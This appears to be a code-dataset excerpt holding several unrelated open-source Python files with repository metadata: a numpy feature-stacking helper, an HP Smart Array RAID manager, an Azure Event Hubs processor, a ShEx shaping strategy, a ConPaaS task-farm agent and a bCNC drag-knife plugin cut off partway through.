:obj:`bool`, optional If ``True``, it assumes that arrays inside all the paths are the same shape. If you know the features are the same size in all paths, set this to ``True`` to improve the performance. dtype : :py:class:`numpy.dtype`, optional If provided, the data will be casted to this format. Returns ------- numpy.ndarray The read features with the shape ``(n_samples, *features_shape[1:])``. Examples -------- This function in a simple way is equivalent to calling ``numpy.vstack([reader(p) for p in paths])``. >>> import numpy >>> from bob.io.base import vstack_features >>> def reader(path): ... # in each file, there are 5 samples and features are 2 dimensional. ... return numpy.arange(10).reshape(5,2) >>> paths = ['path1', 'path2'] >>> all_features = vstack_features(reader, paths) >>> numpy.allclose(all_features, numpy.array( ... [[0, 1], ... [2, 3], ... [4, 5], ... [6, 7], ... [8, 9], ... [0, 1], ... [2, 3], ... [4, 5], ... [6, 7], ... [8, 9]])) True >>> all_features_with_more_memory = numpy.vstack([reader(p) for p in paths]) >>> numpy.allclose(all_features, all_features_with_more_memory) True You can allocate the array at once to improve the performance if you know that all features in paths have the same shape and you know the total number of the paths: >>> all_features = vstack_features(reader, paths, same_size=True) >>> numpy.allclose(all_features, numpy.array( ... [[0, 1], ... [2, 3], ... [4, 5], ... [6, 7], ... [8, 9], ... [0, 1], ... [2, 3], ... [4, 5], ... [6, 7], ... [8, 9]])) True """ iterable = _generate_features(reader, paths, same_size) data_dtype, shape = next(iterable) if dtype is None: dtype = data_dtype if same_size: # numpy black magic: https://stackoverflow.com/a/12473478/1286165 field_dtype = [("", (dtype, (numpy.prod(shape),)))] total_size = len(paths) all_features = numpy.fromiter(iterable, field_dtype, total_size) else: field_dtype = [("", (dtype, (numpy.prod(shape[1:]),)))] all_features = numpy.fromiter(iterable, field_dtype) # go from a field array to a normal array all_features = all_features.view(dtype) # the shape is assumed to be (n_samples, ...) it can be (5, 2) or (5, 3, 4). 
shape = list(shape) shape[0] = -1 return numpy.reshape(all_features, shape, order="C") # gets sphinx autodoc done right - don't remove it __all__ = [_ for _ in dir() if not _.startswith('_')]
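A hedged sketch of vstack_features with an on-disk reader, assuming bob.io.base is installed; the .npy file names are placeholders, and each file is expected to hold a (n_samples, n_features) array.

import numpy
from functools import partial
from bob.io.base import vstack_features

# each path is read with numpy.load; partial is used as the docstring suggests
reader = partial(numpy.load, allow_pickle=False)
paths = ["feats_part1.npy", "feats_part2.npy"]   # placeholder file names
all_features = vstack_features(reader, paths)
print(all_features.shape)                        # (total_samples, n_features)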
1.898438
2
proliantutils/hpssa/manager.py
anta-nok/proliantutils
0
12768043
<filename>proliantutils/hpssa/manager.py # Copyright 2015 Hewlett-Packard Development Company, L.P. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import json import os import time import jsonschema from jsonschema import exceptions as json_schema_exc from proliantutils import exception from proliantutils.hpssa import constants from proliantutils.hpssa import disk_allocator from proliantutils.hpssa import objects CURRENT_DIR = os.path.dirname(os.path.abspath(__file__)) RAID_CONFIG_SCHEMA = os.path.join(CURRENT_DIR, "raid_config_schema.json") def _update_physical_disk_details(raid_config, server): """Adds the physical disk details to the RAID configuration passed.""" raid_config['physical_disks'] = [] physical_drives = server.get_physical_drives() for physical_drive in physical_drives: physical_drive_dict = physical_drive.get_physical_drive_dict() raid_config['physical_disks'].append(physical_drive_dict) def validate(raid_config): """Validates the RAID configuration provided. This method validates the RAID configuration provided against a JSON schema. :param raid_config: The RAID configuration to be validated. :raises: InvalidInputError, if validation of the input fails. """ raid_schema_fobj = open(RAID_CONFIG_SCHEMA, 'r') raid_config_schema = json.load(raid_schema_fobj) try: jsonschema.validate(raid_config, raid_config_schema) except json_schema_exc.ValidationError as e: raise exception.InvalidInputError(e.message) for logical_disk in raid_config['logical_disks']: # If user has provided 'number_of_physical_disks' or # 'physical_disks', validate that they have mentioned at least # minimum number of physical disks required for that RAID level. raid_level = logical_disk['raid_level'] min_disks_reqd = constants.RAID_LEVEL_MIN_DISKS[raid_level] no_of_disks_specified = None if 'number_of_physical_disks' in logical_disk: no_of_disks_specified = logical_disk['number_of_physical_disks'] elif 'physical_disks' in logical_disk: no_of_disks_specified = len(logical_disk['physical_disks']) if (no_of_disks_specified and no_of_disks_specified < min_disks_reqd): msg = ("RAID level %(raid_level)s requires at least %(number)s " "disks." % {'raid_level': raid_level, 'number': min_disks_reqd}) raise exception.InvalidInputError(msg) def _select_controllers_by(server, select_condition, msg): """Filters out the hpssa controllers based on the condition. This method updates the server with only the controller which satisfies the condition. The controllers which doesn't satisfies the selection condition will be removed from the list. :param server: The object containing all the supported hpssa controllers details. :param select_condition: A lambda function to select the controllers based on requirement. :param msg: A String which describes the controller selection. :raises exception.HPSSAOperationError, if all the controller are in HBA mode. 
""" all_controllers = server.controllers supported_controllers = [c for c in all_controllers if select_condition(c)] if not supported_controllers: reason = ("None of the available SSA controllers %(controllers)s " "have %(msg)s" % {'controllers': ', '.join([c.id for c in all_controllers]), 'msg': msg}) raise exception.HPSSAOperationError(reason=reason) server.controllers = supported_controllers def create_configuration(raid_config): """Create a RAID configuration on this server. This method creates the given RAID configuration on the server based on the input passed. :param raid_config: The dictionary containing the requested RAID configuration. This data structure should be as follows: raid_config = {'logical_disks': [{'raid_level': 1, 'size_gb': 100}, <info-for-logical-disk-2> ]} :returns: the current raid configuration. This is same as raid_config with some extra properties like root_device_hint, volume_name, controller, physical_disks, etc filled for each logical disk after its creation. :raises exception.InvalidInputError, if input is invalid. :raises exception.HPSSAOperationError, if all the controllers are in HBA mode. """ server = objects.Server() select_controllers = lambda x: not x.properties.get('HBA Mode Enabled', False) _select_controllers_by(server, select_controllers, 'RAID enabled') validate(raid_config) # Make sure we create the large disks first. This is avoid the # situation that we avoid giving large disks to smaller requests. # For example, consider this: # - two logical disks - LD1(50), LD(100) # - have 4 physical disks - PD1(50), PD2(50), PD3(100), PD4(100) # # In this case, for RAID1 configuration, if we were to consider # LD1 first and allocate PD3 and PD4 for it, then allocation would # fail. So follow a particular order for allocation. # # Also make sure we create the MAX logical_disks the last to make sure # we allot only the remaining space available. logical_disks_sorted = ( sorted((x for x in raid_config['logical_disks'] if x['size_gb'] != "MAX"), reverse=True, key=lambda x: x['size_gb']) + [x for x in raid_config['logical_disks'] if x['size_gb'] == "MAX"]) if any(logical_disk['share_physical_disks'] for logical_disk in logical_disks_sorted if 'share_physical_disks' in logical_disk): logical_disks_sorted = _sort_shared_logical_disks(logical_disks_sorted) # We figure out the new disk created by recording the wwns # before and after the create, and then figuring out the # newly found wwn from it. wwns_before_create = set([x.wwn for x in server.get_logical_drives()]) for logical_disk in logical_disks_sorted: if 'physical_disks' not in logical_disk: disk_allocator.allocate_disks(logical_disk, server, raid_config) controller_id = logical_disk['controller'] controller = server.get_controller_by_id(controller_id) if not controller: msg = ("Unable to find controller named '%(controller)s'." " The available controllers are '%(ctrl_list)s'." % {'controller': controller_id, 'ctrl_list': ', '.join( [c.id for c in server.controllers])}) raise exception.InvalidInputError(reason=msg) if 'physical_disks' in logical_disk: for physical_disk in logical_disk['physical_disks']: disk_obj = controller.get_physical_drive_by_id(physical_disk) if not disk_obj: msg = ("Unable to find physical disk '%(physical_disk)s' " "on '%(controller)s'" % {'physical_disk': physical_disk, 'controller': controller_id}) raise exception.InvalidInputError(msg) controller.create_logical_drive(logical_disk) # Now find the new logical drive created. 
server.refresh() wwns_after_create = set([x.wwn for x in server.get_logical_drives()]) new_wwn = wwns_after_create - wwns_before_create if not new_wwn: reason = ("Newly created logical disk with raid_level " "'%(raid_level)s' and size %(size_gb)s GB not " "found." % {'raid_level': logical_disk['raid_level'], 'size_gb': logical_disk['size_gb']}) raise exception.HPSSAOperationError(reason=reason) new_logical_disk = server.get_logical_drive_by_wwn(new_wwn.pop()) new_log_drive_properties = new_logical_disk.get_logical_drive_dict() logical_disk.update(new_log_drive_properties) wwns_before_create = wwns_after_create.copy() _update_physical_disk_details(raid_config, server) return raid_config def _sort_shared_logical_disks(logical_disks): """Sort the logical disks based on the following conditions. When the share_physical_disks is True make sure we create the volume which needs more disks first. This avoids the situation of insufficient disks for some logical volume request. For example, - two logical disk with number of disks - LD1(3), LD2(4) - have 4 physical disks In this case, if we consider LD1 first then LD2 will fail since not enough disks available to create LD2. So follow a order for allocation when share_physical_disks is True. Also RAID1 can share only when there is logical volume with only 2 disks. So make sure we create RAID 1 first when share_physical_disks is True. And RAID 1+0 can share only when the logical volume with even number of disks. :param logical_disks: 'logical_disks' to be sorted for shared logical disks. :returns: the logical disks sorted based the above conditions. """ is_shared = (lambda x: True if ('share_physical_disks' in x and x['share_physical_disks']) else False) num_of_disks = (lambda x: x['number_of_physical_disks'] if 'number_of_physical_disks' in x else constants.RAID_LEVEL_MIN_DISKS[x['raid_level']]) # Separate logical disks based on share_physical_disks value. # 'logical_disks_shared' when share_physical_disks is True and # 'logical_disks_nonshared' when share_physical_disks is False logical_disks_shared = [] logical_disks_nonshared = [] for x in logical_disks: target = (logical_disks_shared if is_shared(x) else logical_disks_nonshared) target.append(x) # Separete logical disks with raid 1 from the 'logical_disks_shared' into # 'logical_disks_shared_raid1' and remaining as # 'logical_disks_shared_excl_raid1'. logical_disks_shared_raid1 = [] logical_disks_shared_excl_raid1 = [] for x in logical_disks_shared: target = (logical_disks_shared_raid1 if x['raid_level'] == '1' else logical_disks_shared_excl_raid1) target.append(x) # Sort the 'logical_disks_shared' in reverse order based on # 'number_of_physical_disks' attribute, if provided, otherwise minimum # disks required to create the logical volume. logical_disks_shared = sorted(logical_disks_shared_excl_raid1, reverse=True, key=num_of_disks) # Move RAID 1+0 to first in 'logical_disks_shared' when number of physical # disks needed to create logical volume cannot be shared with odd number of # disks and disks higher than that of RAID 1+0. 
check = True for x in logical_disks_shared: if x['raid_level'] == "1+0": x_num = num_of_disks(x) for y in logical_disks_shared: if y['raid_level'] != "1+0": y_num = num_of_disks(y) if x_num < y_num: check = (True if y_num % 2 == 0 else False) if check: break if not check: logical_disks_shared.remove(x) logical_disks_shared.insert(0, x) check = True # Final 'logical_disks_sorted' list should have non shared logical disks # first, followed by shared logical disks with RAID 1, and finally by the # shared logical disks sorted based on number of disks and RAID 1+0 # condition. logical_disks_sorted = (logical_disks_nonshared + logical_disks_shared_raid1 + logical_disks_shared) return logical_disks_sorted def delete_configuration(): """Delete a RAID configuration on this server. :returns: the current RAID configuration after deleting all the logical disks. """ server = objects.Server() select_controllers = lambda x: not x.properties.get('HBA Mode Enabled', False) _select_controllers_by(server, select_controllers, 'RAID enabled') for controller in server.controllers: # Trigger delete only if there is some RAID array, otherwise # hpssacli/ssacli will fail saying "no logical drives found.". if controller.raid_arrays: controller.delete_all_logical_drives() return get_configuration() def get_configuration(): """Get the current RAID configuration. Get the RAID configuration from the server and return it as a dictionary. :returns: A dictionary of the below format. raid_config = { 'logical_disks': [{ 'size_gb': 100, 'raid_level': 1, 'physical_disks': [ '5I:0:1', '5I:0:2'], 'controller': 'Smart array controller' }, ] } """ server = objects.Server() logical_drives = server.get_logical_drives() raid_config = {} raid_config['logical_disks'] = [] for logical_drive in logical_drives: logical_drive_dict = logical_drive.get_logical_drive_dict() raid_config['logical_disks'].append(logical_drive_dict) _update_physical_disk_details(raid_config, server) return raid_config def has_erase_completed(): server = objects.Server() drives = server.get_physical_drives() if any((drive.erase_status == 'Erase In Progress') for drive in drives): return False else: return True def erase_devices(): """Erase all the drives on this server. This method performs sanitize erase on all the supported physical drives in this server. This erase cannot be performed on logical drives. :returns: a dictionary of controllers with drives and the erase status. :raises exception.HPSSAException, if none of the drives support sanitize erase. """ server = objects.Server() for controller in server.controllers: drives = [x for x in controller.unassigned_physical_drives if (x.get_physical_drive_dict().get('erase_status', '') == 'OK')] if drives: controller.erase_devices(drives) while not has_erase_completed(): time.sleep(300) server.refresh() status = {} for controller in server.controllers: drive_status = {x.id: x.erase_status for x in controller.unassigned_physical_drives} sanitize_supported = controller.properties.get( 'Sanitize Erase Supported', 'False') if sanitize_supported == 'False': msg = ("Drives overwritten with zeros because sanitize erase " "is not supported on the controller.") else: msg = ("Sanitize Erase performed on the disks attached to " "the controller.") drive_status.update({'Summary': msg}) status[controller.id] = drive_status return status
1.445313
1
sdk/eventhub/azure-eventhubs/azure/eventhub/_eventprocessor/event_processor.py
mjudeikis/azure-sdk-for-python
0
12768171
# -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- import uuid import logging import time import threading from functools import partial from .partition_context import PartitionContext from .ownership_manager import OwnershipManager from .common import CloseReason from. _eventprocessor_mixin import EventProcessorMixin _LOGGER = logging.getLogger(__name__) class EventProcessor(EventProcessorMixin): # pylint:disable=too-many-instance-attributes """ An EventProcessor constantly receives events from one or multiple partitions of the Event Hub in the context of a given consumer group. """ def __init__(self, eventhub_client, consumer_group, on_event, **kwargs): self._consumer_group = consumer_group self._eventhub_client = eventhub_client self._namespace = eventhub_client._address.hostname # pylint: disable=protected-access self._eventhub_name = eventhub_client.eventhub_name self._event_handler = on_event self._partition_id = kwargs.get("partition_id", None) self._error_handler = kwargs.get("on_error", None) self._partition_initialize_handler = kwargs.get("on_partition_initialize", None) self._partition_close_handler = kwargs.get("on_partition_close", None) self._checkpoint_store = kwargs.get("checkpoint_store", None) self._initial_event_position = kwargs.get("initial_event_position", "-1") self._initial_event_position_inclusive = kwargs.get("initial_event_position_inclusive", False) self._load_balancing_interval = kwargs.get("load_balancing_interval", 10.0) self._ownership_timeout = self._load_balancing_interval * 2 self._partition_contexts = {} # Receive parameters self._owner_level = kwargs.get("owner_level", None) if self._checkpoint_store and self._owner_level is None: self._owner_level = 0 self._prefetch = kwargs.get("prefetch", None) self._track_last_enqueued_event_properties = kwargs.get("track_last_enqueued_event_properties", False) self._id = str(uuid.uuid4()) self._running = False self._lock = threading.RLock() self._consumers = {} self._ownership_manager = OwnershipManager( self._eventhub_client, self._consumer_group, self._id, self._checkpoint_store, self._ownership_timeout, self._partition_id ) def __repr__(self): return 'EventProcessor: id {}'.format(self._id) def _cancel_tasks_for_partitions(self, to_cancel_partitions): with self._lock: for partition_id in to_cancel_partitions: if partition_id in self._consumers: self._consumers[partition_id].stop = True if to_cancel_partitions: _LOGGER.info("EventProcesor %r has cancelled partitions %r", self._id, to_cancel_partitions) def _create_tasks_for_claimed_ownership(self, claimed_partitions, checkpoints=None): with self._lock: for partition_id in claimed_partitions: if partition_id not in self._consumers: if partition_id in self._partition_contexts: partition_context = self._partition_contexts[partition_id] else: partition_context = PartitionContext( self._namespace, self._eventhub_name, self._consumer_group, partition_id, self._checkpoint_store ) self._partition_contexts[partition_id] = partition_context checkpoint = checkpoints.get(partition_id) if checkpoints else None initial_event_position, event_postition_inclusive =\ self.get_init_event_position(partition_id, checkpoint) event_received_callback = partial(self._on_event_received, 
partition_context) self._consumers[partition_id] = self.create_consumer(partition_id, initial_event_position, event_postition_inclusive, event_received_callback) if self._partition_initialize_handler: self._handle_callback( [self._partition_initialize_handler, self._partition_contexts[partition_id]] ) def _handle_callback(self, callback_and_args): callback = callback_and_args[0] try: callback(*callback_and_args[1:]) except Exception as exp: # pylint:disable=broad-except partition_context = callback_and_args[1] if self._error_handler and callback != self._error_handler: self._handle_callback([self._error_handler, partition_context, exp]) else: _LOGGER.warning( "EventProcessor instance %r of eventhub %r partition %r consumer group %r" " has another error during running process_error(). The exception is %r.", self._id, partition_context.eventhub_name, partition_context.partition_id, partition_context.consumer_group, exp ) def _on_event_received(self, partition_context, event): with self._context(event): if self._track_last_enqueued_event_properties: partition_context._last_received_event = event # pylint: disable=protected-access self._handle_callback([self._event_handler, partition_context, event]) def _load_balancing(self): """Start the EventProcessor. The EventProcessor will try to claim and balance partition ownership with other `EventProcessor` and start receiving EventData from EventHub and processing events. :return: None """ while self._running: try: checkpoints = self._ownership_manager.get_checkpoints() if self._checkpoint_store else None claimed_partition_ids = self._ownership_manager.claim_ownership() if claimed_partition_ids: to_cancel_list = set(self._consumers.keys()) - set(claimed_partition_ids) self._create_tasks_for_claimed_ownership(claimed_partition_ids, checkpoints) else: _LOGGER.info("EventProcessor %r hasn't claimed an ownership. It keeps claiming.", self._id) to_cancel_list = set(self._consumers.keys()) if to_cancel_list: self._cancel_tasks_for_partitions(to_cancel_list) except Exception as err: # pylint:disable=broad-except _LOGGER.warning("An exception (%r) occurred during balancing and claiming ownership for " "eventhub %r consumer group %r. Retrying after %r seconds", err, self._eventhub_name, self._consumer_group, self._load_balancing_interval) # ownership_manager.get_checkpoints() and ownership_manager.claim_ownership() may raise exceptions # when there are load balancing and/or checkpointing (checkpoint_store isn't None). # They're swallowed here to retry every self._load_balancing_interval seconds. # Meanwhile this event processor won't lose the partitions it has claimed before. # If it keeps failing, other EventProcessors will start to claim ownership of the partitions # that this EventProcessor is working on. So two or multiple EventProcessors may be working # on the same partition. time.sleep(self._load_balancing_interval) def _close_consumer(self, partition_id, consumer, reason): consumer.close() with self._lock: del self._consumers[partition_id] _LOGGER.info( "PartitionProcessor of EventProcessor instance %r of eventhub %r partition %r consumer group %r" " is being closed. 
Reason is: %r", self._id, self._partition_contexts[partition_id].eventhub_name, self._partition_contexts[partition_id].partition_id, self._partition_contexts[partition_id].consumer_group, reason ) if self._partition_close_handler: self._handle_callback([self._partition_close_handler, self._partition_contexts[partition_id], reason]) self._ownership_manager.release_ownership(partition_id) def start(self): if self._running: _LOGGER.info("EventProcessor %r has already started.", self._id) return _LOGGER.info("EventProcessor %r is being started", self._id) self._running = True thread = threading.Thread(target=self._load_balancing) thread.daemon = True thread.start() while self._running: for partition_id, consumer in list(self._consumers.items()): if consumer.stop: self._close_consumer(partition_id, consumer, CloseReason.OWNERSHIP_LOST) continue try: consumer.receive() except Exception as error: # pylint:disable=broad-except _LOGGER.warning( "PartitionProcessor of EventProcessor instance %r of eventhub %r partition %r consumer group %r" " has met an error. The exception is %r.", self._id, self._partition_contexts[partition_id].eventhub_name, self._partition_contexts[partition_id].partition_id, self._partition_contexts[partition_id].consumer_group, error ) if self._error_handler: self._handle_callback([self._error_handler, self._partition_contexts[partition_id], error]) self._close_consumer(partition_id, consumer, CloseReason.OWNERSHIP_LOST) with self._lock: for partition_id, consumer in list(self._consumers.items()): self._close_consumer(partition_id, consumer, CloseReason.SHUTDOWN) def stop(self): """Stop the EventProcessor. The EventProcessor will stop receiving events from EventHubs and release the ownership of the partitions it is working on. Other running EventProcessor will take over these released partitions. A stopped EventProcessor can be restarted by calling method `start` again. :return: None """ if not self._running: _LOGGER.info("EventProcessor %r has already been stopped.", self._id) return self._running = False _LOGGER.info("EventProcessor %r has been stopped.", self._id)
1.53125
2
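A small, hedged illustration of the callback-binding pattern used by _on_event_received and _create_tasks_for_claimed_ownership above: functools.partial fixes the partition context once, so the per-partition consumer only has to supply the event. The names and values here are placeholders, not the azure-eventhub public API.

from functools import partial

def on_event(partition_context, event):
    # Application handler: receives the bound context plus the new event.
    print("partition %s received %r" % (partition_context, event))

# Bind the context when the partition is claimed...
event_received_callback = partial(on_event, "partition-0")

# ...then the consumer can invoke it with just the event.
event_received_callback({"body": b"hello"})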
shexer/core/shexing/strategy/direct_and_inverse_shexing_strategy.py
DaniFdezAlvarez/dbpedia-shexer
0
12768299
<filename>shexer/core/shexing/strategy/direct_and_inverse_shexing_strategy.py from shexer.core.shexing.strategy.asbtract_shexing_strategy import AbstractShexingStrategy from shexer.utils.shapes import build_shapes_name_for_class_uri from shexer.model.statement import Statement from shexer.model.shape import Shape _POS_FEATURES_DIRECT = 0 _POS_FEATURES_INVERSE = 1 class DirectAndInverseShexingStrategy(AbstractShexingStrategy): def __init__(self, class_shexer): super().__init__(class_shexer) self._class_profile_dict = self._class_shexer._class_profile_dict self._shapes_namespace = self._class_shexer._shapes_namespace self._class_counts_dict = self._class_shexer._class_counts_dict def remove_statements_to_gone_shapes(self, shape, shape_names_to_remove): shape.direct_statements = self._statements_without_shapes_to_remove( original_statements=shape.direct_statements, shape_names_to_remove=shape_names_to_remove) shape.inverse_statements = self._statements_without_shapes_to_remove( original_statements=shape.inverse_statements, shape_names_to_remove=shape_names_to_remove) def yield_base_shapes(self, acceptance_threshold): for a_class_key in self._class_profile_dict: name = build_shapes_name_for_class_uri(class_uri=a_class_key, shapes_namespace=self._shapes_namespace) number_of_instances = float(self._class_counts_dict[a_class_key]) direct_statements = self._build_base_direct_statements(acceptance_threshold, a_class_key, number_of_instances) inverse_statements = self._build_base_inverse_statements(acceptance_threshold=acceptance_threshold, class_key=a_class_key, number_of_instances=number_of_instances) yield Shape(name=name, class_uri=a_class_key, statements=direct_statements + inverse_statements) def set_valid_shape_constraints(self, shape): valid_statements = self._select_valid_statements_of_shape(shape.direct_statements) valid_statements += self._select_valid_statements_of_shape(shape.inverse_statements) self._tune_list_of_valid_statements(valid_statements=valid_statements) shape.statements = valid_statements def _build_base_inverse_statements(self, acceptance_threshold, class_key, number_of_instances): result = [] for a_prop_key in self._class_profile_dict[class_key][_POS_FEATURES_INVERSE]: for a_type_key in self._class_profile_dict[class_key][_POS_FEATURES_INVERSE][a_prop_key]: for a_cardinality in self._class_profile_dict[class_key][_POS_FEATURES_INVERSE][a_prop_key][a_type_key]: frequency = self._compute_frequency(number_of_instances, self._class_profile_dict [class_key] [_POS_FEATURES_INVERSE] [a_prop_key] [a_type_key] [a_cardinality]) if frequency >= acceptance_threshold: result.append(Statement(st_property=a_prop_key, st_type=a_type_key, cardinality=a_cardinality, probability=frequency, is_inverse=True)) return result def _build_base_direct_statements(self, acceptance_threshold, class_key, number_of_instances): result = [] for a_prop_key in self._class_profile_dict[class_key][_POS_FEATURES_DIRECT]: for a_type_key in self._class_profile_dict[class_key][_POS_FEATURES_DIRECT][a_prop_key]: for a_cardinality in self._class_profile_dict[class_key][_POS_FEATURES_DIRECT][a_prop_key][a_type_key]: frequency = self._compute_frequency(number_of_instances, self._class_profile_dict [class_key] [_POS_FEATURES_DIRECT] [a_prop_key] [a_type_key] [a_cardinality]) if frequency >= acceptance_threshold: result.append(Statement(st_property=a_prop_key, st_type=a_type_key, cardinality=a_cardinality, probability=frequency, is_inverse=False)) return result # def _set_serializer_object_for_statements(self, 
statement): # statement.serializer_object = BaseStatementSerializer( # instantiation_property_str=self._instantiation_property_str, # disable_comments=self._disable_comments, # is_inverse=statement.is_inverse) # # def _get_serializer_for_choice_statement(self): # return FixedPropChoiceStatementSerializer( # instantiation_property_str=self._instantiation_property_str, # disable_comments=self._disable_comments, # is_inverse=statement.is_inverse)
1.664063
2
conpaas-services/src/conpaas/services/taskfarm/agent/agent.py
bopopescu/conpaas-1
5
12768427
<reponame>bopopescu/conpaas-1 # -*- coding: utf-8 -*- """ :copyright: (C) 2010-2013 by Contrail Consortium. """ from subprocess import Popen from conpaas.core.expose import expose from conpaas.core.https.server import HttpJsonResponse from conpaas.core.agent import BaseAgent class TaskFarmAgent(BaseAgent): """Agent class with the following exposed methods: check_agent_process() -- GET create_hub(my_ip) -- POST create_node(my_ip, hub_ip) -- POST """ def __init__(self, config_parser, **kwargs): """Initialize TaskFarm Agent. 'config_parser' represents the agent config file. **kwargs holds anything that can't be sent in config_parser. """ BaseAgent.__init__(self, config_parser) # Path to the TaskFarm JAR file self.taskfarm_dir = config_parser.get('agent', 'CONPAAS_HOME') # The following two variables have the same value on the Hub self.my_ip_address = None self.hub_ip_address = None @expose('POST') def create_hub(self, kwargs): """Create a TaskFarm Hub by starting taskfarm server with -role hub""" self.logger.info('Hub starting up') self.state = 'PROLOGUE' self.my_ip_address = self.hub_ip_address = kwargs['my_ip'] # Starting taskfarm hub start_args = [ "java", "-jar", "taskfarm-server", "-role", "hub" ] self.logger.debug("Running command: '%s'. cwd='%s'" % ( " ".join(start_args), self.taskfarm_dir)) proc = Popen(start_args, cwd=self.taskfarm_dir, close_fds=True) self.state = 'RUNNING' self.logger.info('Hub started up. TaskFarm pid=%d' % proc.pid) return HttpJsonResponse() @expose('POST') def create_node(self, kwargs): """Create a TaskFarm Node. As this host will actually fire up browser sessions, and we want to run the tests in a non-interactive fashion, X output will be sent to a fake display.""" self.logger.info('Node starting up') self.state = 'ADAPTING' self.my_ip_address = kwargs['my_ip'] self.hub_ip_address = kwargs['hub_ip'] # Running the TaskFarm Node via xvfb-run and DISPLAY set to :1. We # have to specify the PATH because Popen overrides all the environment # variables if env is specified. Using port 3306 (MySQL) to avoid # requesting yet another port to be open. # TODO: as this file was created from a BLUEPRINT file, # you may want to change ports, paths and/or other start_args # to meet your specific service/server needs start_args = [ "xvfb-run", "--auto-servernum", "java", "-jar", "taskfarm-server", "-role", "node", "-port", "3306", "-hub", "http://%s:4444/grid/register" % self.hub_ip_address, "-host", self.my_ip_address, "-maxSession", "6", "-browser", "browserName=firefox,maxInstances=3", "-browser", "browserName=chrome,maxInstances=3", ] env = { 'DISPLAY': ':1', 'PATH': '/bin:/usr/bin:/usr/local/bin' } self.logger.debug("Running command: '%s'. cwd='%s', env='%s'" % ( " ".join(start_args), self.taskfarm_dir, env)) proc = Popen(start_args, cwd=self.taskfarm_dir, env=env, close_fds=True) self.state = 'RUNNING' self.logger.info('Node started up. TaskFarm pid=%d' % proc.pid) return HttpJsonResponse()
1.4375
1
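A tiny sketch of the caveat noted in create_node() above: when env= is passed, Popen replaces the child's entire environment, so PATH must be supplied explicitly. The command is just "env" for illustration and assumes a POSIX system.

from subprocess import Popen

env = {'DISPLAY': ':1', 'PATH': '/bin:/usr/bin:/usr/local/bin'}

# Only DISPLAY and PATH exist in the child's environment now; without PATH,
# bare command names like "xvfb-run" or "java" would not be found.
proc = Popen(["env"], env=env, close_fds=True)
proc.wait()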
plugins/dragknife.py
hdo/bCNC
0
12768555
#!/usr/bin/python # -*- coding: ascii -*- # Author: @harvie <NAME> # Date: 25 sept 2018 __author__ = "@harvie <NAME>" #__email__ = "" __name__ = _("DragKnife") __version__ = "0.3.0" import math import os.path import re from CNC import CNC,Block from bmath import Vector from bpath import eq, Path, Segment from ToolsPage import Plugin from math import pi, sqrt, sin, cos, asin, acos, atan2, hypot, degrees, radians, copysign, fmod class Tool(Plugin): __doc__ = _("""Drag knife postprocessor""") #<<< This comment will be show as tooltip for the ribbon button def __init__(self, master): Plugin.__init__(self, master,"DragKnife") self.icon = "dragknife" #<<< This is the name of file used as icon for the ribbon button. It will be search in the "icons" subfolder self.group = "CAM" #<<< This is the name of group that plugin belongs #self.oneshot = True #Here we are creating the widgets presented to the user inside the plugin #Name, Type , Default value, Description self.variables = [ #<<< Define a list of components for the GUI ("name" , "db" , "", _("Name")), #used to store plugin settings in the internal database ("offset", "mm", 3, _("dragknife offset"), _("distance from dragknife rotation center to the tip of the blade")), ("angle", "float", 20, _("angle threshold"), _("do not perform pivot action for angles smaller than this")), ("swivelz", "mm", 0, _("swivel height"), _("retract to this height for pivots (useful for thick materials, you should enter number slightly lower than material thickness)")), ("initdir", "X+,Y+,Y-,X-,none", "X+", _("initial direction"), _("direction that knife blade is facing before and after cut. Eg.: if you set this to X+, then the knifes rotation axis should be on the right side of the tip. Meaning that the knife is ready to cut towards right immediately without pivoting. If you cut multiple shapes in single operation, it's important to have this set consistently across all of them.")), ("feed", "mm", 200, _("feedrate")), ("simulate", "bool", False, _("simulate"), _("Use this option to simulate cuting of dragknife path. Resulting shape will reflect what shape will actuall be cut. This should reverse the dragknife procedure and give you back the original shape from g-code that was previously processed for dragknife.")), ("simpreci", "mm", 0.5, _("simulation precision"), _("Simulation is currently approximated by using lots of short lines. This is the length of these lines.")) ] self.buttons.append("exe") #<<< This is the button added at bottom to call the execute method below self.help = """DragKnifes are special kind of razor/blade holders that can be fit into spindle of your CNC (do not turn the spindle on!!!). They are often used to cut soft and thin materials like vinyl stickers, fabric, leather, rubber gaskets, paper, cardboard, etc... Dragknife blade is located off center to allow for automatic rotation (kinda like rear wheels of car pivot to the direction of front wheels). This fact introduces the need for preprocessing the g-code to account with that offset. Otherwise it wouldn't be able to cut sharp corners. This plugin does this g-code postprocessing. 
""" # ---------------------------------------------------------------------- # This method is executed when user presses the plugin execute button # ---------------------------------------------------------------------- def execute(self, app): dragoff = self.fromMm("offset") angleth = self["angle"] swivelz = self.fromMm("swivelz") initdir = self["initdir"] CNC.vars["cutfeed"] = self.fromMm("feed") simulate = self["simulate"] simpreci = self["simpreci"] def initPoint(P, dir, offset): P = Vector(P[0], P[1]) if dir == 'X+': P[0]+=offset elif dir == 'X-': P[0]-=offset elif dir == 'Y+': P[1]+=offset elif dir == 'Y-': P[1]-=offset return P blocks = [] for bid in app.editor.getSelectedBlocks(): if len(app.gcode.toPath(bid)) < 1: continue opath = app.gcode.toPath(bid)[0] npath = Path("dragknife %s: %s"%(dragoff,app.gcode[bid].name())) if not simulate: #Entry vector ventry = Segment(Segment.LINE, initPoint(opath[0].A, initdir, -dragoff), opath[0].A) #Exit vector vexit = Segment(Segment.LINE, opath[-1].B, initPoint(opath[-1].B, initdir, dragoff)) opath.append(vexit) prevseg = ventry #Generate path with tangential lag for dragknife operation for i,seg in enumerate(opath): #Get adjacent tangential vectors in this point TA = prevseg.tangentEnd() TB = seg.tangentStart() #Compute difference between tangential vectors of two neighbor segments angle = degrees(acos(TA.dot(TB))) #Compute swivel direction arcdir = ( TA[0] * TB[1] ) - ( TA[1] * TB[0] ) if arcdir < 0: arcdir = Segment.CW else: arcdir = Segment.CCW #Append swivel if needed (also always do entry/exit) if abs(angle) > angleth or (abs(angle) > 1 and ( i == 0 or i == len(opath)-1 )): arca = Segment(arcdir, prevseg.tangentialOffset(dragoff).B, 